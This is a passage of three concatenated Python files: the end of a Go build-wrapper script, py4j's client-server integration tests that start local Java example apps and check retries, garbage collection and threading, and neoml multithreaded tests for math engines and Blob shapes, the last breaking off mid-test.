    parser.add_argument('++non-local-peers', nargs='*')
    parser.add_argument('++cgo-peers', nargs='*')
    parser.add_argument('++asmhdr', nargs='?', default=None)
    parser.add_argument('++test-import-path', nargs='?')
    parser.add_argument('++test-miner', nargs='?')
    parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
    parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
    parser.add_argument('++extld', nargs='?', default=None)
    parser.add_argument('++extldflags', nargs='+', default=None)
    parser.add_argument('++goversion', required=True)
    parser.add_argument('++asm-flags', nargs='*')
    parser.add_argument('++compile-flags', nargs='*')
    parser.add_argument('++link-flags', nargs='*')
    parser.add_argument('++vcs', nargs='?', default=None)
    # ++vet without a value enables vet with the toolchain binary (const=True);
    # with a value it names the vet binary to run.
    parser.add_argument('++vet', nargs='?', const=True, default=False)
    parser.add_argument('++vet-flags', nargs='*', default=None)
    parser.add_argument('++vet-info-ext', default=vet_info_ext)
    parser.add_argument('++vet-report-ext', default=vet_report_ext)
    parser.add_argument('++musl', action='store_true')
    parser.add_argument('++skip-tests', nargs='*', default=None)
    parser.add_argument('++ydx-file', default='')
    parser.add_argument('++debug-root-map', default=None)
    args = parser.parse_args()
    preprocess_args(args)

    # Override the module-level defaults with the user-supplied values; the
    # helper functions read these globals.
    arc_project_prefix = args.arc_project_prefix
    std_lib_prefix = args.std_lib_prefix
    vet_info_ext = args.vet_info_ext
    vet_report_ext = args.vet_report_ext

    # Ensure a stale output never survives a failed build.
    try:
        os.unlink(args.output)
    except OSError:
        pass

    # We are going to support only 'lib', 'exe' and 'cgo' build modes currently
    # and as a result we are going to generate only one build node per module
    # (or program)
    dispatch = {
        'exe': do_link_exe,
        'dll': do_link_exe,
        'lib': do_link_lib,
        'test': do_link_test
    }

    exit_code = 1
    try:
        dispatch[args.mode](args)
        exit_code = 0
    except KeyError:
        print >>sys.stderr, 'Unknown build mode [{}]...'.format(args.mode)
    except subprocess.CalledProcessError as e:
        print >>sys.stderr, '{} returned non-zero exit code {}. stop.'.format(' '.join(e.cmd), e.returncode)
        print >>sys.stderr, e.output
        exit_code = e.returncode
    except Exception as e:
        print >>sys.stderr, "Unhandled exception [{}]...".format(str(e))
    sys.exit(exit_code)
|
client_server_test.py | # -*- coding: UTF-8 -*-
from contextlib import contextmanager
import gc
from multiprocessing import Process
import subprocess
import threading
import unittest
from py4j.clientserver import (
ClientServer, JavaParameters, PythonParameters)
from py4j.java_gateway import GatewayConnectionGuard, is_instance_of, \
GatewayParameters, DEFAULT_PORT, DEFAULT_PYTHON_PROXY_PORT
from py4j.protocol import Py4JError, Py4JJavaError, smart_decode
from py4j.tests.java_callback_test import IHelloImpl
from py4j.tests.java_gateway_test import (
PY4J_JAVA_PATH, check_connection, sleep, WaitOperator)
from py4j.tests.py4j_callback_recursive_example import (
PythonPing, HelloState)
def start_clientserver_example_server():
    """Launch the Java SingleThreadApplication example (blocks until it exits)."""
    cmd = [
        "java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
        "py4j.examples.SingleThreadApplication"]
    subprocess.call(cmd)
def start_short_timeout_clientserver_example_server():
    """Launch the single-thread Java example configured with a short timeout."""
    cmd = [
        "java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
        "py4j.examples.SingleThreadApplication$"
        "SingleThreadShortTimeoutApplication"]
    subprocess.call(cmd)
def start_java_clientserver_example_server():
    """Launch the Java client example (Java initiates calls to Python)."""
    cmd = [
        "java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
        "py4j.examples.SingleThreadClientApplication"]
    subprocess.call(cmd)
def start_java_clientserver_gc_example_server():
    """Launch the Java garbage-collection stress example."""
    cmd = [
        "java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
        "py4j.examples.SingleThreadClientGCApplication"]
    subprocess.call(cmd)
def start_clientserver_example_app_process(
        start_java_client=False, start_short_timeout=False,
        start_gc_test=False):
    """Start one of the example Java apps in a child process.

    XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    """
    # Flag precedence mirrors the original if/elif chain.
    if start_short_timeout:
        target = start_short_timeout_clientserver_example_server
    elif start_java_client:
        target = start_java_clientserver_example_server
    elif start_gc_test:
        target = start_java_clientserver_gc_example_server
    else:
        target = start_clientserver_example_server
    proc = Process(target=target)
    proc.start()
    sleep()
    check_connection()
    return proc
@contextmanager
def clientserver_example_app_process(
        start_java_client=False, start_short_timeout=False,
        start_gc_test=False, join=True):
    """Context manager yielding an example-app process.

    The child is joined on exit unless join is False (callers that join
    explicitly inside the with-block pass join=False).
    """
    proc = start_clientserver_example_app_process(
        start_java_client, start_short_timeout, start_gc_test)
    try:
        yield proc
    finally:
        if join:
            proc.join()
def start_java_multi_client_server_app():
    """Launch the Java MultiClientServer example (blocks until it exits)."""
    cmd = [
        "java", "-Xmx512m", "-cp", PY4J_JAVA_PATH,
        "py4j.examples.MultiClientServer"]
    subprocess.call(cmd)
def start_java_multi_client_server_app_process():
    """Start the MultiClientServer Java example and verify both gateways.

    XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    """
    proc = Process(target=start_java_multi_client_server_app)
    proc.start()
    sleep()
    # test both gateways...
    for port in (DEFAULT_PORT, DEFAULT_PORT + 2):
        check_connection(gateway_parameters=GatewayParameters(port=port))
    return proc
@contextmanager
def java_multi_client_server_app_process():
    """Context manager yielding the MultiClientServer process; joins on exit."""
    proc = start_java_multi_client_server_app_process()
    try:
        yield proc
    finally:
        proc.join()
class HelloObjects(object):
    """Python callback target receiving object pairs from Java.

    Counts invocations and links each received pair into a reference cycle,
    so the objects survive until a full (cyclic) garbage collection pass.
    """

    def __init__(self):
        # Number of sendObject invocations so far.
        self.calls = 0

    def sendObject(self, o1, o2):
        # Tie the two objects into a cycle: plain reference counting cannot
        # reclaim them when this call returns; only a full gc pass can.
        o1.cycle = o2
        o2.cycle = o1
        self.calls += 1
        return ""

    class Java:
        implements = ["py4j.examples.IHelloObject"]
class GarbageCollectionTest(unittest.TestCase):
    """End-to-end check that GC during Py4J traffic does not break connections."""

    def testSendObjects(self):
        """This test receives 1000 calls creating object cycles.

        Typically, the garbage collector will starts in the middle of
        Py4J connection code, which will create an error if the garbage
        collection is done on the same thread.
        """
        hello = HelloObjects()
        client_server = ClientServer(
            JavaParameters(), PythonParameters(), hello)
        # join=False: we join explicitly before shutting the server down.
        with clientserver_example_app_process(
                start_gc_test=True, join=False) as p:
            p.join()
        client_server.shutdown()
        # assertEqual: assertEquals is a deprecated alias.
        self.assertEqual(1000, hello.calls)
class RetryTest(unittest.TestCase):
    def testBadRetry(self):
        """Should not retry from Python to Java.

        Python calls a long Java method. The call goes through, but the
        response takes a long time to get back.

        If there is a bug, Python will fail on read and retry (sending the same
        call twice).

        If there is no bug, Python will fail on read and raise an Exception.
        """
        # read_timeout shorter than the 500ms server-side sleep forces the
        # read failure this test is about.
        client_server = ClientServer(
            JavaParameters(read_timeout=0.250), PythonParameters())
        with clientserver_example_app_process():
            try:
                example = client_server.jvm.py4j.examples.ExampleClass()
                # The failure message reports the call count, which would
                # exceed one if a retry happened.
                value = example.sleepFirstTimeOnly(500)
                self.fail(
                    "Should never retry once the first command went through."
                    "number of calls made: {0}".format(value))
            except Py4JError:
                self.assertTrue(True)
            finally:
                client_server.shutdown()
    def testGoodRetry(self):
        """Should retry from Python to Java.

        Python calls Java twice in a row, then waits, then calls again.
        Java fails when it does not receive calls quickly.

        If there is a bug, Python will fail on the third call because the Java
        connection was closed and it did not retry.

        If there is a bug, Python might not fail because Java did not close the
        connection on timeout. The connection used to call Java will be the
        same one for all calls (and an assertion will fail).

        If there is no bug, Python will call Java twice with the same
        connection. On the third call, the write will fail, and a new
        connection will be created.
        """
        client_server = ClientServer(
            JavaParameters(), PythonParameters())
        # Peek at the connection pool to observe connection reuse/replacement.
        connections = client_server._gateway_client.deque
        with clientserver_example_app_process(False, True):
            try:
                # Call #1
                client_server.jvm.System.currentTimeMillis()
                str_connection = str(connections[0])
                # Call #2
                client_server.jvm.System.currentTimeMillis()
                self.assertEqual(1, len(connections))
                str_connection2 = str(connections[0])
                self.assertEqual(str_connection, str_connection2)

                # Sleep past the server's short timeout so it drops the
                # connection before call #3.
                sleep(0.5)
                client_server.jvm.System.currentTimeMillis()
                self.assertEqual(1, len(connections))
                str_connection3 = str(connections[0])
                # A new connection was automatically created.
                self.assertNotEqual(str_connection, str_connection3)
            except Py4JError:
                self.fail("Should retry automatically by default.")
            finally:
                client_server.shutdown()
    def testBadRetryFromJava(self):
        """Should not retry from Java to Python.
        Similar use case as testBadRetry, but from Java: Java calls a long
        Python operation.
        If there is a bug, Java will call Python, then read will fail, then it
        will call Python again.
        If there is no bug, Java will call Python, read will fail, then Java
        will raise an Exception that will be received as a Py4JError on the
        Python side.
        """
        client_server = ClientServer(
            JavaParameters(), PythonParameters())
        with clientserver_example_app_process(False, True):
            try:
                # A callback that takes 0.5 s — long enough that the Java
                # read fails while Python is still working (see docstring).
                operator = WaitOperator(0.5)
                opExample = client_server.jvm.py4j.examples.OperatorExample()
                opExample.randomBinaryOperator(operator)
                self.fail(
                    "Should never retry once the first command went through."
                    " number of calls made: {0}".format(operator.callCount))
            except Py4JError:
                # XXX This occurs when WaitOperator tries to send a response to
                # the Java side (this is slightly different then the
                # GatewayServer equivalent where the Py4JError occurs on the
                # clientserver, but the Java side can still send back an
                # exception to the JavaGateway).
                self.assertTrue(True)
            finally:
                client_server.shutdown()
    def testGoodRetryFromJava(self):
        """Should retry from Java to Python.
        Similar use case as testGoodRetry, but from Java: Python calls Java,
        which calls Python back. Then Java waits for a while and calls Python
        again.
        Because Python Server has been waiting for too much time, the
        receiving socket has closed so the call from Java to Python will fail
        on send, and Java must retry by creating a new connection
        (ClientServerConnection).
        Because ClientServer reuses the same connection in each thread, we must
        launch a new thread on the Java side to correctly test the Python
        Server.
        """
        # read_timeout=0.25 s makes the Python server drop idle connections
        # quickly so that Java's second call is forced to reconnect.
        client_server = ClientServer(
            JavaParameters(), PythonParameters(read_timeout=0.250))
        with clientserver_example_app_process():
            try:
                operator = WaitOperator(0)
                opExample = client_server.jvm.py4j.examples.OperatorExample()
                # Java calls back after 500 ms, well past the 250 ms timeout.
                opExample.launchOperator(operator, 500)
                sleep(0.1)
                str_connection = str(
                    list(client_server._callback_server.connections)[0])
                sleep(0.75)
                str_connection2 = str(
                    list(client_server._callback_server.connections)[0])
                # The second callback must have arrived on a fresh connection.
                self.assertNotEqual(str_connection, str_connection2)
            except Py4JJavaError:
                self.fail("Callbackserver did not retry.")
            finally:
                client_server.shutdown()
class IntegrationTest(unittest.TestCase):
    """End-to-end ClientServer tests that talk to live Java example apps.

    Fix applied: the deprecated ``assertEquals`` alias (removed in
    Python 3.12) is replaced by ``assertEqual`` throughout, matching the
    rest of this file.
    """

    def testJavaClientPythonServer(self):
        """Java drives the app and calls back into the Python HelloState."""
        hello_state = HelloState()
        client_server = ClientServer(
            JavaParameters(), PythonParameters(), hello_state)
        with clientserver_example_app_process(True):
            client_server.shutdown()
        # Check that Java correctly called Python
        self.assertEqual(2, len(hello_state.calls))
        self.assertEqual((None, None), hello_state.calls[0])
        self.assertEqual((2, "Hello World"), hello_state.calls[1])

    def testBasicJVM(self):
        """A trivial JVM call goes through and returns a plausible value."""
        with clientserver_example_app_process():
            client_server = ClientServer(
                JavaParameters(), PythonParameters())
            ms = client_server.jvm.System.currentTimeMillis()
            self.assertTrue(ms > 0)
            client_server.shutdown()

    def testErrorInPy4J(self):
        """A conversion error raises Py4JError without breaking the link."""
        with clientserver_example_app_process():
            client_server = ClientServer(
                JavaParameters(), PythonParameters())
            try:
                client_server.jvm.java.lang.Math.abs(
                    3000000000000000000000000000000000000)
                self.fail("Should not be able to convert overflowing long")
            except Py4JError:
                self.assertTrue(True)
            # Check that the connection is not broken (refs #265)
            val = client_server.jvm.java.lang.Math.abs(-4)
            self.assertEqual(4, val)
            client_server.shutdown()

    def testStream(self):
        """getStream is usable both as a Java object and as a binary stream."""
        with clientserver_example_app_process():
            client_server = ClientServer(
                JavaParameters(), PythonParameters())
            e = client_server.entry_point.getNewExample()
            # not binary - just get the Java object
            v1 = e.getStream()
            self.assertTrue(
                is_instance_of(
                    client_server, v1,
                    "java.nio.channels.ReadableByteChannel"))
            # pull it as a binary stream
            with e.getStream.stream() as conn:
                self.assertTrue(isinstance(conn, GatewayConnectionGuard))
                expected =\
                    u"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
                self.assertEqual(
                    expected, smart_decode(conn.read(len(expected))))
            client_server.shutdown()

    def testRecursionWithAutoGC(self):
        """Recursive Python<->Java ping-pong works with auto_gc enabled."""
        with clientserver_example_app_process():
            client_server = ClientServer(
                JavaParameters(auto_gc=True), PythonParameters(auto_gc=True))
            pingpong = client_server.jvm.py4j.examples.PingPong()
            ping = PythonPing()
            self.assertEqual(2, pingpong.start(ping))
            # PingPong(True): the Java side raises during the exchange.
            pingpong = client_server.jvm.py4j.examples.PingPong(True)
            try:
                pingpong.start(ping)
                self.fail()
            except Py4JJavaError:
                # TODO Make sure error are recursively propagated
                # Also a problem with old threading model.
                self.assertTrue(True)
            # PythonPing(True): the Python side raises during the exchange.
            ping = PythonPing(True)
            pingpong = client_server.jvm.py4j.examples.PingPong(False)
            try:
                pingpong.start(ping)
                self.fail()
            except Py4JJavaError:
                # TODO Make sure error are recursively propagated
                # Also a problem with old threading model.
                self.assertTrue(True)
            client_server.shutdown()

    def testJavaGC(self):
        """Java GC evicts Python proxies and tells Python to release them."""
        # This will only work with some JVM.
        with clientserver_example_app_process():
            client_server = ClientServer(
                JavaParameters(), PythonParameters())
            example = client_server.entry_point.getNewExample()
            impl = IHelloImpl()
            self.assertEqual("This is Hello!", example.callHello(impl))
            self.assertEqual(
                "This is Hello;\n10MyMy!\n;",
                example.callHello2(impl))
            self.assertEqual(2, len(client_server.gateway_property.pool))
            # Make sure that finalizers do not block by calling the Java
            # finalizer again
            impl2 = IHelloImpl()
            self.assertEqual("This is Hello!", example.callHello(impl2))
            self.assertEqual(3, len(client_server.gateway_property.pool))
            # The two PythonProxies should be evicted on the Java side
            # Java should tell python to release the references.
            client_server.jvm.java.lang.System.gc()
            # Leave time for sotimeout
            sleep(3)
            self.assertTrue(len(client_server.gateway_property.pool) < 2)
            client_server.shutdown()

    def testPythonGC(self):
        """Python GC releases Java-side bindings once references are dropped."""
        def internal_function(client_server):
            example = client_server.entry_point.getNewExample()
            in_middle = len(
                client_server.java_gateway_server.getGateway().getBindings())
            self.assertEqual(1, example.method1())
            # After this method is executed, Python no longer need
            # a reference to example and it should tell Java to release
            # the reference too
            return in_middle
        with clientserver_example_app_process():
            # This will only work with some JVM.
            client_server = ClientServer(
                JavaParameters(), PythonParameters())
            before = len(
                client_server.java_gateway_server.getGateway().getBindings())
            in_middle = internal_function(client_server)
            # Force Python to run garbage collection in case it did
            # not run yet.
            sleep()
            gc.collect()
            sleep()
            after = len(
                client_server.java_gateway_server.getGateway().getBindings())
            # Number of references on the Java side should be the same before
            # and after
            self.assertEqual(before, after)
            # Number of references when we created a JavaObject should be
            # higher than at the beginning.
            self.assertTrue(in_middle > before)
            client_server.shutdown()

    def testMultiClientServerWithSharedJavaThread(self):
        """Two ClientServers sharing one Java thread map to distinct Python threads."""
        with java_multi_client_server_app_process():
            client_server0 = ClientServer(
                JavaParameters(), PythonParameters())
            client_server1 = ClientServer(
                JavaParameters(port=DEFAULT_PORT + 2),
                PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT + 2))
            entry0 = client_server0.entry_point
            entry1 = client_server1.entry_point
            # set up the ability for Java to get the Python thread ids
            threadIdGetter0 = PythonGetThreadId(client_server0)
            threadIdGetter1 = PythonGetThreadId(client_server1)
            entry0.setPythonThreadIdGetter(threadIdGetter0)
            entry1.setPythonThreadIdGetter(threadIdGetter1)
            thisThreadId = threading.current_thread().ident
            # ## Preconditions
            # Make sure we are talking to two different Entry points on
            # Java side
            self.assertEqual(0, entry0.getEntryId())
            self.assertEqual(1, entry1.getEntryId())
            # ## 1 Hop to Shared Java Thread
            # Check that the shared Java thread is the same thread
            # for both ClientServers
            sharedJavaThreadId = entry0.getSharedJavaThreadId()
            self.assertEqual(sharedJavaThreadId,
                             entry1.getSharedJavaThreadId())
            # And that it is distinct from either corresponding to
            # this Python thread
            self.assertNotEqual(sharedJavaThreadId, entry0.getJavaThreadId())
            self.assertNotEqual(sharedJavaThreadId, entry1.getJavaThreadId())
            # ## 2 Hops via Shared Java Thread to Python Thread
            # Check that the shared thread ends up as different threads
            # in the Python side. This part may not be obvious as the
            # top-level idea seems to be for Python thread to be pinned
            # to Java thread. Consider that this case is a simplification
            # of the real case. In the real case there are two
            # ClientServers running in same JVM, but in Python side each
            # ClientServer is in its own process. In that case it makes
            # it obvious that the shared Java thread should indeed
            # end up in different Python threads.
            sharedPythonThreadId0 = entry0.getSharedPythonThreadId()
            sharedPythonThreadId1 = entry1.getSharedPythonThreadId()
            # three way assert to make sure all three python
            # threads are distinct
            self.assertNotEqual(thisThreadId, sharedPythonThreadId0)
            self.assertNotEqual(thisThreadId, sharedPythonThreadId1)
            self.assertNotEqual(sharedPythonThreadId0, sharedPythonThreadId1)
            # Check that the Python thread id does not change between
            # invocations
            self.assertEqual(sharedPythonThreadId0,
                             entry0.getSharedPythonThreadId())
            self.assertEqual(sharedPythonThreadId1,
                             entry1.getSharedPythonThreadId())
            # ## 3 Hops to Shared Java Thread
            # Check that the thread above after 2 hops calls back
            # into the Java shared thread
            self.assertEqual(sharedJavaThreadId,
                             entry0.getSharedViaPythonJavaThreadId())
            self.assertEqual(sharedJavaThreadId,
                             entry1.getSharedViaPythonJavaThreadId())
            client_server0.shutdown()
            client_server1.shutdown()

    def testMultiClientServer(self):
        """Round trips over two ClientServers stay pinned to their threads."""
        with java_multi_client_server_app_process():
            client_server0 = ClientServer(
                JavaParameters(), PythonParameters())
            client_server1 = ClientServer(
                JavaParameters(port=DEFAULT_PORT + 2),
                PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT + 2))
            entry0 = client_server0.entry_point
            entry1 = client_server1.entry_point
            # set up the ability for Java to get the Python thread ids
            threadIdGetter0 = PythonGetThreadId(client_server0)
            threadIdGetter1 = PythonGetThreadId(client_server1)
            entry0.setPythonThreadIdGetter(threadIdGetter0)
            entry1.setPythonThreadIdGetter(threadIdGetter1)
            thisThreadId = threading.current_thread().ident
            # Make sure we are talking to two different Entry points on
            # Java side
            self.assertEqual(0, entry0.getEntryId())
            self.assertEqual(1, entry1.getEntryId())
            # ## 0 Hops to Thread ID
            # Check that the two thread getters get the same thread
            self.assertEqual(thisThreadId,
                             int(threadIdGetter0.getThreadId()))
            self.assertEqual(thisThreadId,
                             int(threadIdGetter1.getThreadId()))
            # ## 1 Hop to Thread ID
            # Check that ClientServers on Java side are on different threads
            javaThreadId0 = entry0.getJavaThreadId()
            javaThreadId1 = entry1.getJavaThreadId()
            self.assertNotEqual(javaThreadId0, javaThreadId1)
            # Check that ClientServers on Java side stay on same thread
            # on subsequent calls to them
            self.assertEqual(javaThreadId0, entry0.getJavaThreadId())
            self.assertEqual(javaThreadId1, entry1.getJavaThreadId())
            # Check alternate way of getting thread ids and that they match
            self.assertEqual(javaThreadId0,
                             int(threadIdGetter0.getJavaThreadId()))
            self.assertEqual(javaThreadId1,
                             int(threadIdGetter1.getJavaThreadId()))
            # ## 2 Hops to Thread ID
            # Check that round trips from Python to Java and Python
            # end up back on this thread, regardless of which
            # client server we use for the round trip
            self.assertEqual(thisThreadId,
                             entry0.getPythonThreadId())
            self.assertEqual(thisThreadId,
                             entry1.getPythonThreadId())
            # ## 3 Hops to Thread ID
            # Check that round trips from Python to Java to Python to Java
            # end up on the same thread as 1 hop
            self.assertEqual(javaThreadId0,
                             entry0.getViaPythonJavaThreadId())
            self.assertEqual(javaThreadId1,
                             entry1.getViaPythonJavaThreadId())
            client_server0.shutdown()
            client_server1.shutdown()
class PythonGetThreadId(object):
    """Callback object that lets Java query Python and Java thread ids.

    Ids are returned as strings: Python 3 has no separate long type, so a
    32-bit value would arrive in Java as an Integer and then fail to be
    converted to the expected Long.
    """

    def __init__(self, gateway):
        self.gateway = gateway

    def getThreadId(self):
        ident = threading.current_thread().ident
        return str(ident)

    def getJavaThreadId(self):
        current = self.gateway.jvm.java.lang.Thread.currentThread()
        return str(current.getId())

    class Java:
        implements = ["py4j.examples.MultiClientServerGetThreadId"]
|
tests.py | from unittest import TestCase
import os
import tempfile
import pickle
import itertools
import numpy as np
from scipy import sparse
import neoml
import threading
class MultithreadedTestCase(TestCase):
    """TestCase base that runs each test body in four concurrent threads.

    The timing check (when enabled) asserts that total CPU time exceeds
    wall-clock time, i.e. that the threads really ran in parallel.
    """

    def _thread_function(self, target, kwargs):
        # Log start/finish so thread interleaving is visible in the output.
        print(f"python thread {threading.get_ident()} started")
        target(**kwargs)
        print(f"python thread {threading.get_ident()} finished")

    def _test_mt(self, target, result, enable_assert=False):
        import time
        workers = []
        wall_start, cpu_start = time.perf_counter(), time.process_time()
        for _ in range(4):
            worker = threading.Thread(
                target=self._thread_function, args=(target, {'result': result}))
            workers.append(worker)
            worker.start()
        for worker in workers:
            worker.join()
        wall_elapsed = time.perf_counter() - wall_start
        cpu_elapsed = time.process_time() - cpu_start
        print()
        print('System time {0:.6f} sec.'.format(wall_elapsed))
        print('User time {0:.6f} sec.'.format(cpu_elapsed))
        if enable_assert:
            self.assertTrue(wall_elapsed < cpu_elapsed)

    def run(self, result=None):
        self._test_mt(super().run, result=result)
class MathEngineTestCase(MultithreadedTestCase):
    """Construction tests for CPU and GPU math engines."""

    def test_gpu_math_engine(self):
        """Invalid GPU indices are rejected; enumerated GPUs construct."""
        # Out-of-range device indices must raise ValueError.
        # assertRaises replaces the original manual check-flag pattern.
        with self.assertRaises(ValueError):
            print(neoml.MathEngine.GpuMathEngine(666).info)
        with self.assertRaises(ValueError):
            print(neoml.MathEngine.GpuMathEngine(-666).info)
        # Every enumerated GPU should be constructible by its index
        # (enumerate replaces the manual index counter).
        for index, _ in enumerate(neoml.MathEngine.enum_gpu()):
            math_engine = neoml.MathEngine.GpuMathEngine(index)
            self.assertTrue(isinstance(math_engine, neoml.MathEngine.GpuMathEngine))

    def test_cpu_math_engine(self):
        """A CPU engine is created and accounts allocated memory."""
        math_engine = neoml.MathEngine.CpuMathEngine()
        self.assertTrue(isinstance(math_engine, neoml.MathEngine.CpuMathEngine))
        # Keep a reference to the blob so its allocation stays counted:
        # 10 int32 elements == 40 bytes of peak usage.
        blob = neoml.Blob.vector(math_engine, 10, "int32")
        self.assertEqual(math_engine.peak_memory_usage, 40)
class BlobTestCase(MultithreadedTestCase):
    """Tests for neoml.Blob creation, serialization and layout accessors.

    Fixes applied: pickle files are opened with context managers, and the
    manual mkdtemp/remove/rmdir sequence (which leaked the temp directory
    whenever an assertion failed) is replaced by TemporaryDirectory.
    """

    def test_pickle(self):
        """A blob survives a pickle round-trip with its shape intact."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        a = np.ones((2, 3, 4, 5), dtype=np.int32)
        shape = (2, 3, 1, 4, 1, 1, 5)
        blob = neoml.Blob.asblob(math_engine, a, shape, False)
        with tempfile.TemporaryDirectory() as tmp_dir:
            path = os.path.join(tmp_dir, 'blob.pickle')
            with open(path, mode='wb') as binary_file:
                pickle.dump(blob, binary_file)
            with open(path, mode='rb') as binary_file:
                loaded_blob = pickle.load(binary_file)
        self.assertEqual(blob.shape, loaded_blob.shape)

    def test_load_store(self):
        """Blob.store / Blob.load round-trip preserves the shape."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        a = np.ones((2, 3, 4, 5), dtype=np.int32)
        shape = (2, 3, 1, 4, 1, 1, 5)
        blob = neoml.Blob.asblob(math_engine, a, shape, False)
        with tempfile.TemporaryDirectory() as tmp_dir:
            path = os.path.join(tmp_dir, 'blob.pickle')
            neoml.Blob.store(blob, path)
            loaded_blob = neoml.Blob.load(math_engine, path)
        self.assertEqual(blob.shape, loaded_blob.shape)

    def test_copy(self):
        """copy() yields a blob with the same shape and array layout."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        a = np.ones((4, 4, 4, 4), dtype=np.int32)
        shape = (4, 4, 1, 4, 4, 1, 1)
        blob = neoml.Blob.asblob(math_engine, a, shape, False)
        blob2 = blob.copy(math_engine)
        self.assertEqual(blob2.shape, blob.shape)
        a2 = blob2.asarray()
        self.assertEqual(a2.shape, a.shape)

    def test_asblob(self):
        """asblob(..., copy=False) aliases the array; asarray(True) copies."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        float_array = np.ones((2, 5, 7, 16), dtype=np.float32)
        shape = (1, 2, 1, 5, 7, 1, 16)
        float_blob = neoml.Blob.asblob(math_engine, float_array, shape, False)
        self.assertEqual(float_blob.shape, shape)
        # Dimension accessors mirror the 7-element shape tuple.
        self.assertEqual(float_blob.batch_len, 1)
        self.assertEqual(float_blob.batch_width, 2)
        self.assertEqual(float_blob.list_size, 1)
        self.assertEqual(float_blob.height, 5)
        self.assertEqual(float_blob.width, 7)
        self.assertEqual(float_blob.depth, 1)
        self.assertEqual(float_blob.channels, 16)
        self.assertEqual(float_blob.size, 2 * 5 * 7 * 16)
        self.assertEqual(float_blob.object_count, 2)
        self.assertEqual(float_blob.object_size, 5 * 7 * 16)
        blob_float_array = float_blob.asarray()        # view of blob data
        blob_float_array2 = float_blob.asarray(True)   # independent copy
        self.assertEqual(blob_float_array.shape, blob_float_array2.shape)
        # Mutating the source array is visible through the view...
        float_array[0][1][1][1] = 2.0
        self.assertEqual(float_array[0][1][1][1], blob_float_array[0][1][1][1])
        # ...but not through the copy taken before the mutation.
        self.assertEqual(1.0, blob_float_array2[0][1][1][1])

    def test_vector(self):
        """vector() puts all elements on the batch_len axis."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        float_blob = neoml.Blob.vector(math_engine, 16, "float32")
        self.assertEqual(float_blob.batch_len, 16)
        self.assertEqual(float_blob.batch_width, 1)
        self.assertEqual(float_blob.list_size, 1)
        self.assertEqual(float_blob.height, 1)
        self.assertEqual(float_blob.width, 1)
        self.assertEqual(float_blob.depth, 1)
        self.assertEqual(float_blob.channels, 1)
        self.assertEqual(float_blob.size, 16)
        self.assertEqual(float_blob.object_count, 16)
        self.assertEqual(float_blob.object_size, 1)

    def test_matrix(self):
        """matrix() fills batch_len x batch_width."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        float_blob = neoml.Blob.matrix(math_engine, 16, 32, "int32")
        self.assertEqual(float_blob.batch_len, 16)
        self.assertEqual(float_blob.batch_width, 32)
        self.assertEqual(float_blob.list_size, 1)
        self.assertEqual(float_blob.height, 1)
        self.assertEqual(float_blob.width, 1)
        self.assertEqual(float_blob.depth, 1)
        self.assertEqual(float_blob.channels, 1)
        self.assertEqual(float_blob.size, 16 * 32)
        self.assertEqual(float_blob.object_count, 16 * 32)
        self.assertEqual(float_blob.object_size, 1)

    def test_tensor(self):
        """tensor() maps a full 7-element shape onto the blob dimensions."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        shape = (1, 2, 3, 4, 5, 6, 7)
        float_blob = neoml.Blob.tensor(math_engine, shape, "int32")
        self.assertEqual(float_blob.batch_len, 1)
        self.assertEqual(float_blob.batch_width, 2)
        self.assertEqual(float_blob.list_size, 3)
        self.assertEqual(float_blob.height, 4)
        self.assertEqual(float_blob.width, 5)
        self.assertEqual(float_blob.depth, 6)
        self.assertEqual(float_blob.channels, 7)
        self.assertEqual(float_blob.size, 1 * 2 * 3 * 4 * 5 * 6 * 7)
        # object_count == batch_len * batch_width * list_size
        self.assertEqual(float_blob.object_count, 2 * 3)
        self.assertEqual(float_blob.object_size, 4 * 5 * 6 * 7)

    def test_list_blob(self):
        """list_blob() fills batch_len, batch_width, list_size and channels."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        float_blob = neoml.Blob.list_blob(math_engine, 2, 3, 4, 5, "int32")
        self.assertEqual(float_blob.batch_len, 2)
        self.assertEqual(float_blob.batch_width, 3)
        self.assertEqual(float_blob.list_size, 4)
        self.assertEqual(float_blob.height, 1)
        self.assertEqual(float_blob.width, 1)
        self.assertEqual(float_blob.depth, 1)
        self.assertEqual(float_blob.channels, 5)
        self.assertEqual(float_blob.size, 2 * 3 * 4 * 5)
        self.assertEqual(float_blob.object_count, 2 * 3 * 4)
        self.assertEqual(float_blob.object_size, 5)

    def test_image2d(self):
        """image2d() fills batch dims, height, width and channels."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        float_blob = neoml.Blob.image2d(math_engine, 2, 3, 4, 5, 6, "float32")
        self.assertEqual(float_blob.batch_len, 2)
        self.assertEqual(float_blob.batch_width, 3)
        self.assertEqual(float_blob.list_size, 1)
        self.assertEqual(float_blob.height, 4)
        self.assertEqual(float_blob.width, 5)
        self.assertEqual(float_blob.depth, 1)
        self.assertEqual(float_blob.channels, 6)
        self.assertEqual(float_blob.size, 2 * 3 * 4 * 5 * 6)
        self.assertEqual(float_blob.object_count, 2 * 3)
        self.assertEqual(float_blob.object_size, 4 * 5 * 6)

    def test_image3d(self):
        """image3d() additionally fills the depth dimension."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        float_blob = neoml.Blob.image3d(math_engine, 2, 3, 4, 5, 6, 7, "float32")
        self.assertEqual(float_blob.batch_len, 2)
        self.assertEqual(float_blob.batch_width, 3)
        self.assertEqual(float_blob.list_size, 1)
        self.assertEqual(float_blob.height, 4)
        self.assertEqual(float_blob.width, 5)
        self.assertEqual(float_blob.depth, 6)
        self.assertEqual(float_blob.channels, 7)
